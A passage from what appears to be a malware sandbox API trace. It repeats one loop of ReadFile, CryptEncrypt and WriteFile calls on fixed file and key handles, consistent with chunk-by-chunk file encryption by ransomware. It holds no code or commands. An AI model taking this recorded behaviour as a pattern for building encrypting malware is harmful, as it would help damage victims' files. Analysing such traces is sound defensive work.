nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.224] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.224] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.224] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.224] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.224] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.224] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.224] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.224] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.224] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.225] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.225] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.225] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.225] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.225] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.225] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.225] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.225] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.225] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.225] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.225] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.225] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.225] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.226] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.226] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.226] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.226] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.226] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.226] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.226] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.226] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.226] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.226] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.226] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.226] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.226] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.226] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.227] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.227] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.227] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.227] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.227] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.227] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.227] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.227] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.227] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.227] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.227] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.227] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.227] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.228] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.228] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.228] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.228] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.228] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.228] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.228] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.228] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.228] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.228] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.228] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.228] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.228] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.228] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.229] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.229] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.229] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.229] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.229] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.229] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.229] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.229] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.229] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.229] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.229] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.229] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.230] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.230] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.230] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.230] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.230] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.230] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.230] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.230] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.230] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.230] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.230] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.230] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.230] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.230] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.231] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.231] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.231] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.231] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.231] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.231] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.231] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.231] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.232] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.232] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.232] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.232] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.232] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.233] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.233] CryptEncrypt 